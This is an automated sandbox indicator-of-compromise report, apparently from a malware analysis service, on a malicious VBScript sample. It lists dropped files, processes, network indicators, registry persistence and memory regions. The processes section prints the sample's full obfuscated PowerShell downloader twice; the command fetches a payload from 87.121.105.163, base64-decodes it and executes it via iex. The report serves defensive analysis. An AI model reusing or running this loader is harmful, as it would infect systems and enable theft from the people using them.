IOC Report
FTG_PD_04024024001.vbs

loading gif

Files

File Path
Type
Category
Malicious
FTG_PD_04024024001.vbs
ASCII text, with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jaoq5ghe.0os.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onvgj3h0.bwf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qitgwwi2.d5m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzd4viyq.535.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s5497I81
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\Argean.Men
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FTG_PD_04024024001.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7 7 8 2R2H, 2 6 6,5P1U)V ');Funmaker $Laryngotome;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
 malicious
C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe
"C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exe"
malicious
C:\Windows\SysWOW64\AtBroker.exe
"C:\Windows\SysWOW64\AtBroker.exe"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
 malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
 malicious
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
unknown
http://www.certplus.com/CRL/class3.crl0
unknown
http://www.e-me.lv/repository0
unknown
http://www.acabogacia.org/doc0
unknown
http://87.121.105.163/EYioOXUtWs45.binM
unknown
http://crl.chambersign.org/chambersroot.crl0
unknown
http://ocsp.suscerte.gob.ve0
unknown
http://www.postsignum.cz/crl/psrootqca2.crl02
unknown
https://aka.ms/pscore6lBeq
unknown
http://crl.dhimyotis.com/certignarootca.crl0
unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
unknown
http://www.chambersign.org1
unknown
http://www.pkioverheid.nl/policies/root-policy0
unknown
http://repository.swisssign.com/0
unknown
http://www.suscerte.gob.ve/lcr0#
unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
unknown
http://crl.ssc.lt/root-c/cacrl.crl0
unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0
unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0
unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
unknown
http://www.certplus.com/CRL/class3P.crl0
unknown
http://www.suscerte.gob.ve/dpc0
unknown
http://www.certeurope.fr/reference/root2.crl0
unknown
http://www.certplus.com/CRL/class2.crl0
unknown
http://www.disig.sk/ca/crl/ca_disig.crl0
unknown
http://www.defence.gov.au/pki0
unknown
https://nuget.org/nuget.exe
unknown
http://www.sk.ee/cps/0
unknown
http://www.globaltrust.info0=
unknown
http://www.anf.es
unknown
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.postsignum.cz/crl/psrootqca4.crl02
unknown
http://pki.registradores.org/normativa/index.htm0
unknown
http://policy.camerfirma.com0
unknown
http://www.ssc.lt/cps03
unknown
http://ocsp.pki.gva.es0
unknown
http://www.anf.es/es/address-direccion.html
unknown
https://www.anf.es/address/)1(0&
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
unknown
http://ca.mtin.es/mtin/ocsp0
unknown
http://crl.ssc.lt/root-b/cacrl.crl0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
unknown
http://www.certicamara.com/dpc/0Z
unknown
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
unknown
https://go.micro
unknown
https://wwww.certigna.fr/autorites/0m
unknown
http://www.dnie.es/dpc0
unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://ca.mtin.es/mtin/DPCyPoliticas0
unknown
https://www.anf.es/AC/ANFServerCA.crl0
unknown
https://repository.tsp.zetes.com0
unknown
http://www.globaltrust.info0
unknown
http://certificates.starfieldtech.com/repository/1604
unknown
http://acedicom.edicomgroup.com/doc0
unknown
http://www.certplus.com/CRL/class3TS.crl0
unknown
https://github.com/Pester/Pester
unknown
https://crl.anf.es/AC/ANFServerCA.crl0
unknown
http://www.certeurope.fr/reference/pc-root2.pdf0
unknown
http://ac.economia.gob.mx/last.crl0G
unknown
http://87.121.105.163/Stereotyperingens72.xsnXRyl4
unknown
https://www.catcert.net/verarrel
unknown
http://www.disig.sk/ca0f
unknown
http://87.121.105.163/
unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.e-szigno.hu/RootCA.crl
unknown
http://www.sk.ee/juur/crl/0
unknown
http://crl.chambersign.org/chambersignroot.crl0
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
http://certs.oati.net/repository/OATICA2.crl0
unknown
http://crl.oces.trust2408.com/oces.crl0
unknown
http://www.quovadis.bm0
unknown
http://crl.ssc.lt/root-a/cacrl.crl0
unknown
http://certs.oaticerts.com/repository/OATICA2.crl
unknown
http://certs.oati.net/repository/OATICA2.crt0
unknown
http://www.accv.es00
unknown
http://www.pkioverheid.nl/policies/root-policy-G20
unknown
https://www.netlock.net/docs
unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
unknown
http://www.e-trust.be/CPS/QNcerts
unknown
http://ocsp.ncdc.gov.sa0
unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0
unknown
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01
unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
unknown
http://www.datev.de/zertifikat-policy-int0
unknown
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
unknown
https://repository.luxtrust.lu0
unknown
http://cps.chambersign.org/cps/chambersroot.html0
unknown
https://contoso.com/License
unknown
http://www.acabogacia.org0
unknown
http://www.firmaprofesional.com/cps0
unknown
http://www.uce.gub.uy/acrn/acrn.crl0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
www.tyaer.com
47.91.88.207
 malicious
www.megabet303.lol
unknown
 malicious
bg.microsoft.map.fastly.net
199.232.214.172
www.oyoing.com
127.0.0.1

IPs

IP
Domain
Country
Malicious
47.91.88.207
www.tyaer.com
United States
malicious
87.121.105.163
unknown
Bulgaria
127.0.0.1
www.oyoing.com
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
AJ5HR8DXLPTX
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1100000
system
page execute and read and write
 malicious
2FD0000
trusted library allocation
page read and write
 malicious
25220000
unclassified section
page execute and read and write
 malicious
2CD0000
system
page execute and read and write
 malicious
1CB10070000
trusted library allocation
page read and write
 malicious
A034000
direct allocation
page execute and read and write
 malicious
2E70000
system
page execute and read and write
 malicious
8CD0000
direct allocation
page execute and read and write
 malicious
2F70000
trusted library allocation
page read and write
 malicious
55D0000
unkown
page execute and read and write
 malicious
6060000
trusted library allocation
page read and write
 malicious
3094000
remote allocation
page execute and read and write
1B66CF9E000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
1B66CDE2000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
281BDC7D000
system
page execute and read and write
7CD93A3000
stack
page read and write
1B66CFBE000
heap
page read and write
4931000
heap
page read and write
1CB6F7A0000
trusted library allocation
page read and write
1020000
unkown
page read and write
7B9E000
stack
page read and write
B30000
unkown
page readonly
6B2E000
stack
page read and write
1B66CC05000
heap
page read and write
1B66CF9F000
heap
page read and write
7F19000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
1B66AF88000
heap
page read and write
6AE0000
heap
page read and write
78B000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
11FD000
system
page execute and read and write
1B66CC05000
heap
page read and write
4F5D000
direct allocation
page execute and read and write
315E000
stack
page read and write
2C08000
heap
page read and write
1B66CD91000
heap
page read and write
4931000
heap
page read and write
715E000
stack
page read and write
1CB102EB000
trusted library allocation
page read and write
1CB0082E000
trusted library allocation
page read and write
8A7C000
heap
page read and write
32BA000
heap
page read and write
1020000
unkown
page read and write
7FF849000000
trusted library allocation
page read and write
1B66AF52000
heap
page read and write
1298000
heap
page read and write
1CB6F720000
heap
page read and write
1B66CDE4000
heap
page read and write
12F13130000
heap
page read and write
4931000
heap
page read and write
34E0000
heap
page read and write
725E000
stack
page read and write
3470000
trusted library allocation
page read and write
1CB7160A000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD89000
heap
page read and write
8D40000
trusted library allocation
page execute and read and write
4C0A000
heap
page read and write
7F87000
heap
page read and write
49DE000
stack
page read and write
1CB0053E000
trusted library allocation
page read and write
3113000
heap
page read and write
1C7000
unkown
page readonly
1B66CD3B000
heap
page read and write
803D000
stack
page read and write
4931000
heap
page read and write
8A1C000
stack
page read and write
10F0000
heap
page read and write
9480000
direct allocation
page execute and read and write
2B30000
unkown
page readonly
1B66CC98000
heap
page read and write
6A39000
heap
page read and write
6B64000
heap
page read and write
4931000
heap
page read and write
7A50000
trusted library allocation
page read and write
1CB6F5B0000
heap
page read and write
3460000
trusted library allocation
page read and write
1CB71644000
heap
page read and write
1B66CFAE000
heap
page read and write
1B66AF6F000
heap
page read and write
1CB00223000
trusted library allocation
page read and write
1290000
heap
page read and write
BD0000
unkown
page readonly
1B66CD58000
heap
page read and write
6A4F000
heap
page read and write
24820000
unclassified section
page execute and read and write
1B66CF9B000
heap
page read and write
1CB0098F000
trusted library allocation
page read and write
8AAA000
heap
page read and write
1CB710AF000
heap
page read and write
1B66CEEB000
heap
page read and write
6B64000
heap
page read and write
1CB6F6F3000
heap
page read and write
281BFABE000
trusted library allocation
page read and write
1CB6F767000
heap
page read and write
1B66CC00000
heap
page read and write
1CB715B3000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4DEF000
stack
page read and write
1B66AF64000
heap
page read and write
7EE2000
heap
page read and write
79DF000
heap
page read and write
1B66AF82000
heap
page read and write
7C90000
trusted library allocation
page read and write
6A42000
heap
page read and write
1B66CDBB000
heap
page read and write
86E0000
trusted library allocation
page read and write
640000
heap
page read and write
4931000
heap
page read and write
7FF848EC0000
trusted library allocation
page execute and read and write
7978000
heap
page read and write
1CB6F680000
trusted library allocation
page read and write
1B66CF1C000
heap
page read and write
2FC0000
heap
page read and write
2F49000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
2FB0000
heap
page read and write
4931000
heap
page read and write
310E000
heap
page read and write
1B66CD8B000
heap
page read and write
4931000
heap
page read and write
4F40000
heap
page read and write
2818A2A0000
heap
page read and write
4DA0000
heap
page read and write
858E000
stack
page read and write
1B66CDD5000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
2229E000
stack
page read and write
8A33000
heap
page read and write
1B66AE40000
heap
page read and write
541C000
stack
page read and write
21C50000
direct allocation
page read and write
4931000
heap
page read and write
22373000
heap
page read and write
281BF640000
trusted library allocation
page read and write
12F13138000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD62000
heap
page read and write
7410000
direct allocation
page read and write
281BDD10000
heap
page read and write
3368000
heap
page read and write
281BF90A000
trusted library allocation
page read and write
1B66CD00000
heap
page read and write
6A10000
heap
page read and write
12D0000
heap
page read and write
1B66CDC7000
heap
page read and write
1CB00001000
trusted library allocation
page read and write
4931000
heap
page read and write
12F134B5000
heap
page read and write
2D7E000
stack
page read and write
1CB7156C000
heap
page read and write
12F13060000
heap
page read and write
4940000
heap
page read and write
1B66CC01000
heap
page read and write
4931000
heap
page read and write
1B66CDFD000
heap
page read and write
7F56000
heap
page read and write
6A42000
heap
page read and write
3042000
heap
page read and write
3531000
heap
page read and write
4931000
heap
page read and write
1B66CC12000
heap
page read and write
2E30000
direct allocation
page read and write
3039000
heap
page read and write
30C6000
heap
page read and write
7F82000
heap
page read and write
4DB9000
direct allocation
page execute and read and write
346A000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CC6B000
heap
page read and write
4931000
heap
page read and write
3440000
trusted library allocation
page read and write
4D9D000
stack
page read and write
1B66CF35000
heap
page read and write
2D3E000
stack
page read and write
1B66CC08000
heap
page read and write
4931000
heap
page read and write
854F000
stack
page read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
6A3B000
heap
page read and write
7F24000
heap
page read and write
1CB7187A000
heap
page read and write
7C80000
trusted library allocation
page read and write
1CB6F6D2000
heap
page read and write
1B66CF3B000
heap
page read and write
1CB71841000
heap
page read and write
1B66CC3A000
heap
page read and write
1B66CD8B000
heap
page read and write
2EE4000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
3410000
trusted library section
page read and write
3538000
heap
page read and write
1CB0060D000
trusted library allocation
page read and write
1CB718D5000
heap
page read and write
1647E7C000
stack
page read and write
1B66CC25000
heap
page read and write
7F08000
heap
page read and write
4931000
heap
page read and write
7FF849140000
trusted library allocation
page read and write
1B66CF35000
heap
page read and write
1040000
unkown
page read and write
2299D000
direct allocation
page execute and read and write
499D000
stack
page read and write
7F01000
heap
page read and write
4DA7000
heap
page read and write
7FF848EB6000
trusted library allocation
page read and write
7F5B000
heap
page read and write
7FF848FBA000
trusted library allocation
page read and write
3527000
heap
page read and write
4931000
heap
page read and write
6D30000
direct allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1290000
heap
page read and write
1B66AF08000
heap
page read and write
4931000
heap
page read and write
7FE9000
heap
page read and write
87BE000
stack
page read and write
7CC0000
trusted library allocation
page read and write
8D20000
direct allocation
page read and write
4931000
heap
page read and write
1CB71824000
heap
page read and write
1B66CEB3000
heap
page read and write
6A5B000
heap
page read and write
6A3B000
heap
page read and write
7CE0000
trusted library allocation
page read and write
4931000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
1C5000
unkown
page read and write
1CB6F6D7000
heap
page read and write
4931000
heap
page read and write
2C20000
heap
page read and write
4C0E000
heap
page read and write
74EE000
stack
page read and write
7EF70000
trusted library allocation
page execute and read and write
1CB01AAC000
trusted library allocation
page read and write
55B0000
trusted library allocation
page read and write
7CD9CFE000
stack
page read and write
4931000
heap
page read and write
4F4E000
stack
page read and write
8815000
trusted library allocation
page read and write
4F10000
heap
page read and write
2818A535000
heap
page read and write
4E2E000
direct allocation
page execute and read and write
1B66D100000
heap
page read and write
2EE0000
remote allocation
page execute and read and write
2EE4000
heap
page read and write
B1511FE000
stack
page read and write
7CA0000
trusted library allocation
page read and write
8710000
heap
page read and write
4931000
heap
page read and write
BF0000
unkown
page readonly
79E1000
heap
page read and write
2E70000
direct allocation
page read and write
1BEB1FE000
stack
page read and write
4C40000
trusted library allocation
page read and write
1B66CD31000
heap
page read and write
4931000
heap
page read and write
D47000
unkown
page read and write
4931000
heap
page read and write
1B66CC25000
heap
page read and write
352C000
heap
page read and write
B1521FF000
stack
page read and write
4931000
heap
page read and write
3342000
heap
page read and write
4931000
heap
page read and write
1CB6F620000
heap
page read and write
1B66AECD000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
1B66CD58000
heap
page read and write
1CB005A7000
trusted library allocation
page read and write
2818A1C0000
heap
page read and write
4931000
heap
page read and write
1B66B118000
heap
page read and write
7CDA8CE000
stack
page read and write
1B66CCAD000
heap
page read and write
1B66CD91000
heap
page read and write
6356000
